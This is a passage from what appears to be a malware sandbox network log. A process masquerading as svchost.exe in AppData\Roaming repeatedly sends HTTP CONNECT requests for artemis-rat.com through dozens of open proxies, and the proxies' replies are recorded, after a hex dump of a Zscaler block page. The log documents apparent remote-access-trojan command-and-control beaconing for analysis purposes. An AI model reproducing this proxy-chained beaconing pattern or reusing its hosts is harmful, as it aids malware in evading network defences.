69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68 Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2284	192.168.2.5	57135	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.634756088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2285	192.168.2.5	56657	70.166.167.55	57745	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.636734009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2286	192.168.2.5	57228	203.74.125.18	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.638292074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.162249088 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2287	192.168.2.5	57240	195.169.35.214	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.646712065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.380350113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.674453020 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2288	192.168.2.5	57183	139.59.1.14	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.651026011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.255623102 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2289	192.168.2.5	57384	172.67.231.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.655725002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.810022116 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2290	192.168.2.5	57242	8.217.143.187	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.655725956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.333719969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2291	192.168.2.5	57236	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.656878948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2292	192.168.2.5	57400	45.14.174.148	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.668252945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.822433949 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2293	192.168.2.5	57404	104.16.230.163	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.669501066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.823930979 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2294	192.168.2.5	57217	184.170.248.5	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.681343079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2295	192.168.2.5	57213	43.131.248.165	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.681922913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2296	192.168.2.5	57215	119.3.215.41	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.683355093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2297	192.168.2.5	55606	117.160.250.163	82	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.701570988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.664654016 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:30 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2298	192.168.2.5	57415	104.16.105.207	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.701690912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.856206894 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2299	192.168.2.5	57235	123.126.158.50	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.701744080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2300	192.168.2.5	57353	199.102.107.145	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.702244997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2301	192.168.2.5	57232	82.157.194.44	7890	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.702941895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.030096054 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2302	192.168.2.5	57344	23.152.40.14	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.702996016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2303	192.168.2.5	57409	208.87.131.240	41368	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.711260080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.333610058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.943123102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.333565950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.834080935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.333679914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2304	192.168.2.5	57625	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.713259935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2305	192.168.2.5	57630	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.715073109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2306	192.168.2.5	57632	8.213.128.6	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.716475964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2307	192.168.2.5	57251	43.131.248.165	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.716485023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2308	192.168.2.5	56269	148.72.215.230	44387	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.716571093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.547861099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2309	192.168.2.5	57264	110.12.211.140	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.718755007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2310	192.168.2.5	57417	162.241.50.179	48156	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.724364996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.333626032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.943074942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146374941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537059069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.942730904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2311	192.168.2.5	57255	43.155.130.182	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.724594116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2312	192.168.2.5	57246	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
